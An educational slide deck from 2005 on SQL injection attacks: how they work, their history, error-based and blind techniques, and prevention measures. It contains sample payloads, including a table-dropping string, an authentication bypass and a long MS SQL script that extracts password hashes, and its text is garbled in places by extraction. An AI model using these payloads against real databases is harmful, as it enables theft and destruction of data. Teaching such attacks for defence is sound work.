SQL Injection Attacks

1
SQL Injection Attacks

• Andrey Rakowitsch
• November 18th 2005

2
First What is SQL?

• Structured Query Language interface to
  relational database systems.
• Allows for insert, update, delete, and retrieval
  of data in a database.
• ANSI, ISO Standard, used extensively in web
  applications.
• Example
• select ProductName from products where ProductID
  40

3
How is it normally used in websites?

• Take user input from a web form and pass it to a
  server-side script via HTTP methods such as POST
  or GET.
• Process request, open connection to database.
• Query database and retrieve results.
• Send processed results back to user.

Web server
Application server
Database server
4
PHP example

• name HTTP_POST_VARS"name"
• query select from restaurants where name
  .name.
• result mysql_query(query)

5
What is SQL Injection?

• The ability to inject SQL commands into the
  database engine through existing application.
• For example, if user input is 23 or 1 1
• select ProductName from products where ProductID
  23 or 1 1
• All product names will be returned. Data leak.

6
What is SQL Injection?

• Flaw in web application not in database or web
  server.
• No matter how patched your system is, no matter
  how many ports you close, an attacker can get
  complete ownership of your database.
• NMap or Nessus will not help you against sloppy
  code.
• In essence client supplied data without
  validation.

7
Brief History of SQL Injection

• First mention by rain forest puppy in Phrack 54,
  December 1998.
• In February 2000 rfp publishes How I hacked
  Packetstorm A look at hacking wwwthreads via
  SQL.
• January 2002 Chris Anley published Advanced SQL
  Injection in SQL Server Applications. First in
  depth paper.
• At Blackhat 2004, 0x90.org release SQeaL
  (predecessor to Absinthe).

8
What can SQL Injection do?

• Delete
• Select productinfo from table where productname
  whatever DROP TABLE productinfo --
• Bypass Authentication
• Select from users where usernameuser and
  passwordpasswd
• select from users where usernameadmin-- and
  passwordwhocares

9
Not always that simple

• Grabbing MS SQL Server Hashes
• ' begin declare _at_var varchar(8000), _at_xdate1
  datetime, _at_binvalue varbinary(255), _at_charvalue
  varchar(255), _at_i int, _at_length int, _at_hexstring
  char(16) set _at_var'' select _at_xdate1(select
  min(xdate1) from master.dbo.sysxlogins where
  password is not null) begin while _at_xdate1 lt
  (select max(xdate1) from master.dbo.sysxlogins
  where password is not null) begin select
  _at_binvalue(select password from
  master.dbo.sysxlogins where xdate1_at_xdate1),
  _at_charvalue '0x', _at_i1, _at_lengthdatalength(_at_binva
  lue), _at_hexstring '0123456789ABCDEF' while
  (_at_ilt_at_length) begin declare _at_tempint int,
  _at_firstint int, _at_secondint int select
  _at_tempintCONVERT(int, SUBSTRING(_at_binvalue,_at_i,1))
  select _at_firstintFLOOR(_at_tempint/16) select
  _at_secondint_at_tempint - (_at_firstint16) select
  _at_charvalue_at_charvalue SUBSTRING
  (_at_hexstring,_at_firstint1,1) SUBSTRING
  (_at_hexstring, _at_secondint1, 1) select _at_i_at_i1
  end select _at_var_at_var' 'name'/'_at_charvalue
  from master.dbo.sysxlogins where xdate1_at_xdate1
  select _at_xdate1 (select isnull(min(xdate1),getdat
  e()) from master..sysxlogins where xdate1gt_at_xdate1
  and password is not null) end select _at_var as x
  into temp end end --

10
Possibilities are endless

• Some examples
• Brute forcing passwords using attacked server to
  do the processing.
• Interact with OS, reading and writing files.
• Gather IP information through reverse lookup.
• Start FTP service on attacked server.
• Retrieve VNC passwords from registry.
• File uploading.

11
Error Based SQL Injection

• select from table where id convert(int,SYSTEM_
  USER)
• Output
• MicrosoftODBC SQL Server DriverSQLServerS
  yntax error converting the nvarchar value sa to
  a column of data type int.
• Error based SQL injection used solely on
  Microsoft SQL Servers

12
Blind SQL Injection

• When no explicit error information is available
  to the attacker.
• Make use of boolean values to ask the database
  yes or no questions then interpret HTML results
  for TRUE and FALSE signatures.
• Much slower In the worst case scenario, it takes
  7 yes or no questions to find the first character
  of a username using binary search.
• That is why automated tools exist.

13
Blind SQL Injection (example)

• Base Cases
• eng.usf.edu/results.jsp?id4 and 1 1 (always
  true)
• eng.usf.edu/results.jsp?id4 and 1 0 (always
  false)
• Is the 8th character of the username greater than
  ASCII value 82?
• Extract data a character at a time.

14
How to recognize T and F signatures?

• Several Solutions
• Keyword search
• MD5 Sum
• Text Difference Engine
• HTML Parse Tree
• Linear representation of ASCII sums
• Tolerance Band Comparison with subtractive filter
• Adaptive filter

15
Blind SQL Injection

• NOTE Even when boolean HTML signatures are not
  available, an attacker can use if statements to
  get a yes or no response. Examples
• ' if condition waitfor delay '005'
• ' union select if( condition , benchmark
  (100000, sha1('test')), 'false' ),1,1,1,1

16
Prevention

• Check and filter user input.
• Length limit on input (most attacks depend on
  long query strings).
• Different types of inputs have a specific
  language and syntax associated with them, i.e.
  name, email, etc
• Do not allow suspicious keywords (DROP, INSERT,
  SELECT, SHUTDOWN) as name for example.
• Try to bind variables to specific types.

17
Prevention

• Call stored procedures, instead of directly
  sending SQL statements to the database.
• Good in order to bind variables.
• Has some overhead associated with it
• Harder to code, not as flexible.

18
Prevention

• Principal of Least Privilege
• A user or process should have the lowest level of
  privilege required in order to perform his
  assigned task.
• If you know a specific user will only read from
  the database, do not grant him root privileges.
• Segregate users. Define roles.

19
Prevention

• Configure error reporting
• Never expose any information to the user.
• Intrusion Detection System
• It is possible to get signatures of SQL Injection
  (especially blind) attacks.
• Log DoS like behavior.
• Warning illegal use of this application has
  been detected. Legal actions will be taken..
• Random seed generation to mess up True and False
  signatures.